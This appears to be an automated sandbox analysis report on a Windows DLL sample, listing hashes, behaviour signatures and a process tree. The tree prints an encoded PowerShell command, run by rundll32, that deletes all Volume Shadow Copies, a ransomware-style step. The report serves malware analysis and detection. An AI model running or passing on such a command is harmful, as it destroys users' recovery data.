Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:46

General

  • Target

    e9bb65f71c76b7c5396553325cbaf0a67e9e29f8960972eb58dccde86c35529f.dll

  • Size

    164KB

  • MD5

    7c26893705115743894c85205606ca7e

  • SHA1

    513c9a3c6c796e1b0d8b6165f872540e9c8d43ec

  • SHA256

    e9bb65f71c76b7c5396553325cbaf0a67e9e29f8960972eb58dccde86c35529f

  • SHA512

    a53cd134ac431a4b262a807b87fb9378c8ab4b86363eeaec17e14e0481be8a89c19b3fbe1aecc77ae49e127c85116fb893f9336658919f9eef7036c929ab3c0e

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\e9bb65f71c76b7c5396553325cbaf0a67e9e29f8960972eb58dccde86c35529f.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1304
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\e9bb65f71c76b7c5396553325cbaf0a67e9e29f8960972eb58dccde86c35529f.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1252
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1660
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:316

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1252-55-0x0000000075F91000-0x0000000075F93000-memory.dmp
    Filesize

    8KB

  • memory/1660-56-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp
    Filesize

    8KB

  • memory/1660-57-0x00000000023A0000-0x00000000023A2000-memory.dmp
    Filesize

    8KB

  • memory/1660-60-0x00000000023A4000-0x00000000023A7000-memory.dmp
    Filesize

    12KB

  • memory/1660-59-0x00000000023A2000-0x00000000023A4000-memory.dmp
    Filesize

    8KB

  • memory/1660-58-0x000007FEF2FC0000-0x000007FEF3B1D000-memory.dmp
    Filesize

    11.4MB

  • memory/1660-61-0x00000000023AB000-0x00000000023CA000-memory.dmp
    Filesize

    124KB